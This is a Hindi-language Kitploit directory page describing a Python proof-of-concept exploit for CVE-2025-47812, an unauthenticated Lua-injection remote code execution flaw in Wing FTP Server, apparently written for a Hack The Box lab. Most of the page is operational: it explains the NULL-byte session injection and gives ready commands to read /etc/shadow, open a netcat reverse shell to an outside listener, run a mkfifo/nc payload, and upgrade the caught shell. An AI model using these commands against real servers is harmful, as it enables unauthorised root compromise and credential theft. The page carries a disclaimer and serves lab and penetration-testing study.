Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-47812 — CVE-2025-47812 Poc wingdata HTB के लिए | Kitploit
उपकरण/GitHubGitHub/0xs4n4tg/cve-2025-47812
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
GitHub0xs4n4tg/cve-2025-47812

CVE-2025-47812

CVE-2025-47812 Poc wingdata HTB के लिए

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-47812 — Wing FTP Server Unauth RCE (पुनर्लेखन)

Wing FTP Server ≤ 7.4.3 में बिना प्रमाणीकरण के Lua-इंजेक्शन RCE के लिए Python एक्सप्लॉइट। शेल डिलीवरी के लिए डिज़ाइन किया गया — check से एक कमांड जो कार्यशील netcat कॉलबैक तक ले जाता है।

कुछ समय पहले HTB पर wingData लैब के लिए लिखा गया था और अब ओपन-सोर्स किया गया है। केवल उन सिस्टमों के विरुद्ध उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की लिखित अनुमति है।

Credits

  • Vulnerability research: Julien (@MrTuxracer) — NULL क्या?! Wing FTP Server RCE (CVE-2025-47812)
  • Original PoC: @4m3rr0r — github.com/4m3rr0r/CVE-2025-47812-poc
  • यह रिपॉजिटरी: उपरोक्त PoC का पुनर्लेखन जो थोड़ा अधिक कार्यात्मक और उपयोग में आसान है।

Vulnerability summary

Wing FTP का c_CheckUser() प्रमाणीकरण के लिए पहले NULL बाइट पर username को काट देता है, लेकिन सत्र-निर्माण पथ पूर्ण असंशोधित उपयोगकर्ता नाम को Lua सत्र फ़ाइल में लिखता है। anonymous%00]]<lua>-- इंजेक्ट करें और सर्वर खुशी-खुशी आपके Lua को सत्र में लिखता है। किसी भी प्रमाणित एंडपॉइंट (dir.html काम करता है) को हिट करने पर वह सत्र फ़ाइल loadfile() → f() के माध्यम से लोड होती है, और इंजेक्ट किए गए कोड को root / SYSTEM के रूप में निष्पादित करती है।

प्रभावित: Wing FTP Server ≤ 7.4.3. 7.4.4 में ठीक किया गया।

Install

root@kitploit:~
pip install requests

बस इतना ही — कोई अन्य निर्भरता नहीं।

Usage

root@kitploit:~
# 1. Confirm the target is vulnerable (runs `id` and checks for `uid=`)
python3 exploit.py -u http://target:5466/ check

# 2. One-off command — captures stdout AND stderr
python3 exploit.py -u http://target:5466/ exec "id"
python3 exploit.py -u http://target:5466/ exec "cat /etc/shadow"
python3 exploit.py -u http://target:5466/ exec "find / -perm -4000 2>/dev/null"

# 3. Reverse shell (the easy path)
#    Terminal 1:
nc -lvnp 4444
#    Terminal 2:
python3 exploit.py -u http://target:5466/ shell 10.10.14.5 4444

# 4. Detached arbitrary payload — fire-and-forget. Useful when bash is missing:
python3 exploit.py -u http://target:5466/ detached \
  "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f"

Flags

Tips

  • पहले पोर्ट सत्यापित करें। वेब UI डिफ़ॉल्ट रूप से 80 पर नहीं है — URL गलत मानने से पहले ब्राउज़र में http://target:5466/login.html आज़माएं।
  • यदि shell मोड कॉलबैक प्राप्त नहीं करता है, तो उपरोक्त mkfifo पेलोड के साथ detached पर वापस जाएं। कुछ न्यूनतम Linux इमेज bash शिप नहीं करती हैं।
  • कैच की गई शेल आने पर उसे अपग्रेड करें:
    root@kitploit:~
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    # Ctrl+Z
    stty raw -echo; fg
    # Enter, Enter
    export TERM=xterm
    

Disclaimer

केवल शैक्षिक उपयोग और अधिकृत सुरक्षा परीक्षण के लिए। जिन लक्ष्यों पर आप इसे इंगित करते हैं, उनके लिए आप जिम्मेदार हैं।

License

MIT — देखें LICENSE।

टूल डाउनलोड करें
FlagDefaultPurpose
-u, --urlrequiredलक्ष्य आधार URL — Wing FTP आमतौर पर :5466 (HTTP) या :5467 (HTTPS) पर सुनता है।
-U, --usernameanonymousNULL बाइट से पहले उपयोगकर्ता नाम। डिफ़ॉल्ट इंस्टॉल पर Anonymous काम करता है।
-P, --passwordemptyइंजेक्शन POST के लिए पासवर्ड। Anonymous के लिए खाली ठीक है।
-v, --verboseoffLua पेलोड, हिट किए गए URL और कच्चे प्रतिक्रिया बॉडी को डंप करता है।